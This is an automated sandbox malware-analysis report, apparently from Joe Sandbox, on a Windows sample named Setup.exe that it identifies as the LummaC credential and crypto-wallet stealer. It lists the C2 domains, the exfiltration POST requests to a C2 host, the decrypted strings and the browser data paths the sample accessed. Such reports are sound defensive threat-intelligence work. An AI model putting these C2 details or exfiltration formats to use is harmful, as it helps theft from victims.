Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Setup.exe

Overview

General Information

Sample name:Setup.exe
Analysis ID:1561424
MD5:9afbb0324051e70f1547c64245bc2df2
SHA1:3687efd1229f5023b1617305071652421941d52e
SHA256:8432d382a8bc238b236f3ef6e1b075f4a1bc048a115a16eae72f0adca56e74ff
Tags:exeuser-aachum
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Detected potential crypto function
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Setup.exe (PID: 6924 cmdline: "C:\Users\user\Desktop\Setup.exe" MD5: 9AFBB0324051E70F1547C64245BC2DF2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["processhol.sbs", "3xp3cts1aim.sbs", "p10tgrace.sbs", "peepburry828.sbs", "p3ar11fter.sbs"], "Build id": "yJEcaG--vick"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    SourceRuleDescriptionAuthorStrings
    00000000.00000003.2387242749.000000000314E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000000.00000002.2468502924.0000000004880000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
      • 0x4f880:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
      • 0x52e16:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
      Process Memory Space: Setup.exe PID: 6924JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
        Process Memory Space: Setup.exe PID: 6924JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: Setup.exe PID: 6924JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
            Click to see the 1 entries
            No Sigma rule has matched
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-23T12:13:19.675065+010020283713Unknown Traffic192.168.2.649730104.21.20.178443TCP
            2024-11-23T12:13:21.651074+010020283713Unknown Traffic192.168.2.649739104.21.20.178443TCP
            2024-11-23T12:13:23.998294+010020283713Unknown Traffic192.168.2.649745104.21.20.178443TCP
            2024-11-23T12:13:26.122673+010020283713Unknown Traffic192.168.2.649750104.21.20.178443TCP
            2024-11-23T12:13:28.323221+010020283713Unknown Traffic192.168.2.649756104.21.20.178443TCP
            2024-11-23T12:13:30.769012+010020283713Unknown Traffic192.168.2.649762104.21.20.178443TCP
            2024-11-23T12:13:32.988573+010020283713Unknown Traffic192.168.2.649769104.21.20.178443TCP
            2024-11-23T12:13:36.449361+010020283713Unknown Traffic192.168.2.649779104.21.20.178443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-23T12:13:20.365527+010020546531A Network Trojan was detected192.168.2.649730104.21.20.178443TCP
            2024-11-23T12:13:22.372936+010020546531A Network Trojan was detected192.168.2.649739104.21.20.178443TCP
            2024-11-23T12:13:37.141318+010020546531A Network Trojan was detected192.168.2.649779104.21.20.178443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-23T12:13:20.365527+010020498361A Network Trojan was detected192.168.2.649730104.21.20.178443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-23T12:13:22.372936+010020498121A Network Trojan was detected192.168.2.649739104.21.20.178443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-23T12:13:31.363301+010020480941Malware Command and Control Activity Detected192.168.2.649762104.21.20.178443TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: Setup.exe.6924.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["processhol.sbs", "3xp3cts1aim.sbs", "p10tgrace.sbs", "peepburry828.sbs", "p3ar11fter.sbs"], "Build id": "yJEcaG--vick"}
            Source: Setup.exeReversingLabs: Detection: 13%
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 85.0% probability
            Source: 00000000.00000002.2468502924.0000000004880000.00000040.00001000.00020000.00000000.sdmpString decryptor: p3ar11fter.sbs
            Source: 00000000.00000002.2468502924.0000000004880000.00000040.00001000.00020000.00000000.sdmpString decryptor: 3xp3cts1aim.sbs
            Source: 00000000.00000002.2468502924.0000000004880000.00000040.00001000.00020000.00000000.sdmpString decryptor: peepburry828.sbs
            Source: 00000000.00000002.2468502924.0000000004880000.00000040.00001000.00020000.00000000.sdmpString decryptor: p10tgrace.sbs
            Source: 00000000.00000002.2468502924.0000000004880000.00000040.00001000.00020000.00000000.sdmpString decryptor: processhol.sbs
            Source: 00000000.00000002.2468502924.0000000004880000.00000040.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
            Source: 00000000.00000002.2468502924.0000000004880000.00000040.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
            Source: 00000000.00000002.2468502924.0000000004880000.00000040.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
            Source: 00000000.00000002.2468502924.0000000004880000.00000040.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
            Source: 00000000.00000002.2468502924.0000000004880000.00000040.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
            Source: Setup.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 104.21.20.178:443 -> 192.168.2.6:49730 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.20.178:443 -> 192.168.2.6:49739 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.20.178:443 -> 192.168.2.6:49745 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.20.178:443 -> 192.168.2.6:49750 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.20.178:443 -> 192.168.2.6:49756 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.20.178:443 -> 192.168.2.6:49762 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.20.178:443 -> 192.168.2.6:49769 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.20.178:443 -> 192.168.2.6:49779 version: TLS 1.2
            Source: Setup.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
            Source: Binary string: D:\repos\main\SSH2\Release\pdbs\sftpc.pdb source: Setup.exe
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\MozillaJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\CommsJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\CEFJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\PackagesJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\3D ObjectsJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\GoogleJump to behavior

            Networking

            barindex
            Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49730 -> 104.21.20.178:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49730 -> 104.21.20.178:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49779 -> 104.21.20.178:443
            Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:49762 -> 104.21.20.178:443
            Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49739 -> 104.21.20.178:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49739 -> 104.21.20.178:443
            Source: Malware configuration extractorURLs: processhol.sbs
            Source: Malware configuration extractorURLs: 3xp3cts1aim.sbs
            Source: Malware configuration extractorURLs: p10tgrace.sbs
            Source: Malware configuration extractorURLs: peepburry828.sbs
            Source: Malware configuration extractorURLs: p3ar11fter.sbs
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49739 -> 104.21.20.178:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49730 -> 104.21.20.178:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49745 -> 104.21.20.178:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49750 -> 104.21.20.178:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49756 -> 104.21.20.178:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49769 -> 104.21.20.178:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49762 -> 104.21.20.178:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49779 -> 104.21.20.178:443
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sturdy-operated.cyou
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 46Host: sturdy-operated.cyou
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=BD5E6OLDUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12798Host: sturdy-operated.cyou
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=BS6O243W6KM6DOQ72UNUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15110Host: sturdy-operated.cyou
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=0Q58BOHIUYEM725MVUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19956Host: sturdy-operated.cyou
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=RM9FMR65RMN9VUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1182Host: sturdy-operated.cyou
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=NF0RBT91GYNTBUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 553763Host: sturdy-operated.cyou
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 81Host: sturdy-operated.cyou
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficDNS traffic detected: DNS query: sturdy-operated.cyou
            Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sturdy-operated.cyou
            Source: Setup.exe, 00000000.00000003.2362750025.0000000005C59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
            Source: Setup.exe, 00000000.00000003.2362750025.0000000005C59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
            Source: Setup.exeString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
            Source: Setup.exeString found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0V
            Source: Setup.exeString found in binary or memory: http://crl.globalsign.com/gsgccr45codesignca2020.crl0
            Source: Setup.exeString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
            Source: Setup.exeString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
            Source: Setup.exe, 00000000.00000003.2362750025.0000000005C59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
            Source: Setup.exe, 00000000.00000003.2362750025.0000000005C59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
            Source: Setup.exe, 00000000.00000003.2362750025.0000000005C59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
            Source: Setup.exe, 00000000.00000003.2362750025.0000000005C59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
            Source: Setup.exe, 00000000.00000003.2362750025.0000000005C59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
            Source: Setup.exe, 00000000.00000003.2362750025.0000000005C59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
            Source: Setup.exeString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
            Source: Setup.exeString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
            Source: Setup.exeString found in binary or memory: http://ocsp.globalsign.com/gsgccr45codesignca20200V
            Source: Setup.exeString found in binary or memory: http://ocsp.globalsign.com/rootr30;
            Source: Setup.exe, 00000000.00000003.2362750025.0000000005C59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
            Source: Setup.exeString found in binary or memory: http://ocsp2.globalsign.com/rootr606
            Source: Setup.exeString found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
            Source: Setup.exeString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45codesignca2020.crt0=
            Source: Setup.exeString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
            Source: Setup.exeString found in binary or memory: http://secure.globalsign.com/cacert/root-r3.crt06
            Source: Setup.exe, 00000000.00000003.2362750025.0000000005C59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
            Source: Setup.exe, 00000000.00000003.2362750025.0000000005C59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
            Source: Setup.exe, 00000000.00000003.2319255162.0000000005C6E000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2319335494.0000000005C6C000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2319449992.0000000005C6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: Setup.exeString found in binary or memory: https://bitvise.com/versions/BvSshServer9https://bitvise.com/versions/BvSshClient9name
            Source: Setup.exe, 00000000.00000003.2363919422.0000000003165000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
            Source: Setup.exe, 00000000.00000003.2363919422.0000000003165000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
            Source: Setup.exe, 00000000.00000003.2319255162.0000000005C6E000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2319335494.0000000005C6C000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2319449992.0000000005C6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: Setup.exe, 00000000.00000003.2319255162.0000000005C6E000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2319335494.0000000005C6C000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2319449992.0000000005C6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: Setup.exe, 00000000.00000003.2319255162.0000000005C6E000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2319335494.0000000005C6C000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2319449992.0000000005C6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: Setup.exe, 00000000.00000003.2363919422.0000000003165000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
            Source: Setup.exe, 00000000.00000003.2363919422.0000000003165000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
            Source: Setup.exe, 00000000.00000003.2319255162.0000000005C6E000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2319335494.0000000005C6C000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2319449992.0000000005C6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: Setup.exe, 00000000.00000003.2319255162.0000000005C6E000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2319335494.0000000005C6C000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2319449992.0000000005C6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: Setup.exe, 00000000.00000003.2319255162.0000000005C6E000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2319335494.0000000005C6C000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2319449992.0000000005C6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: Setup.exe, 00000000.00000003.2363919422.0000000003165000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
            Source: Setup.exe, 00000000.00000003.2387242749.000000000314E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sturdy-operated.cy
            Source: Setup.exe, 00000000.00000003.2340783002.0000000005C2F000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2407580788.0000000005C2C000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2444211079.0000000005C2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sturdy-operated.cyou/
            Source: Setup.exe, 00000000.00000002.2468096237.00000000030E2000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2466570367.000000000313D000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2466366236.00000000030E2000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.2468414880.000000000315A000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2444456913.000000000313C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2423267055.000000000314C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.2468291512.000000000313D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sturdy-operated.cyou/api
            Source: Setup.exe, 00000000.00000002.2468096237.00000000030E2000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2466366236.00000000030E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sturdy-operated.cyou/apiQ
            Source: Setup.exe, 00000000.00000003.2466570367.000000000313D000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.2468291512.000000000313D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sturdy-operated.cyou/apiUR
            Source: Setup.exe, 00000000.00000003.2466570367.000000000313D000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2444456913.000000000313C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.2468291512.000000000313D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sturdy-operated.cyou/apior
            Source: Setup.exe, 00000000.00000003.2363644953.0000000005D4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
            Source: Setup.exe, 00000000.00000003.2363644953.0000000005D4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
            Source: Setup.exe, 00000000.00000003.2363919422.0000000003165000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
            Source: Setup.exe, 00000000.00000003.2319255162.0000000005C6E000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2319335494.0000000005C6C000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2319449992.0000000005C6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: Setup.exeString found in binary or memory: https://www.globalsign.com/repository/0
            Source: Setup.exe, 00000000.00000003.2319255162.0000000005C6E000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2319335494.0000000005C6C000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2319449992.0000000005C6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: Setup.exe, 00000000.00000003.2363543663.0000000005C56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.or
            Source: Setup.exe, 00000000.00000003.2363543663.0000000005C56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
            Source: Setup.exe, 00000000.00000003.2363644953.0000000005D4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
            Source: Setup.exe, 00000000.00000003.2363644953.0000000005D4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
            Source: Setup.exe, 00000000.00000003.2363644953.0000000005D4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
            Source: Setup.exe, 00000000.00000003.2363919422.0000000003165000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
            Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
            Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
            Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
            Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
            Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
            Source: unknownHTTPS traffic detected: 104.21.20.178:443 -> 192.168.2.6:49730 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.20.178:443 -> 192.168.2.6:49739 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.20.178:443 -> 192.168.2.6:49745 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.20.178:443 -> 192.168.2.6:49750 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.20.178:443 -> 192.168.2.6:49756 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.20.178:443 -> 192.168.2.6:49762 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.20.178:443 -> 192.168.2.6:49769 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.20.178:443 -> 192.168.2.6:49779 version: TLS 1.2

            System Summary

            barindex
            Source: 00000000.00000002.2468502924.0000000004880000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
            Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0314B7270_3_0314B727
            Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0314B7270_3_0314B727
            Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0314B7270_3_0314B727
            Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0314B7270_3_0314B727
            Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0314B7270_3_0314B727
            Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0314B7270_3_0314B727
            Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0314B7270_3_0314B727
            Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0314B7270_3_0314B727
            Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0314B7270_3_0314B727
            Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0314B7270_3_0314B727
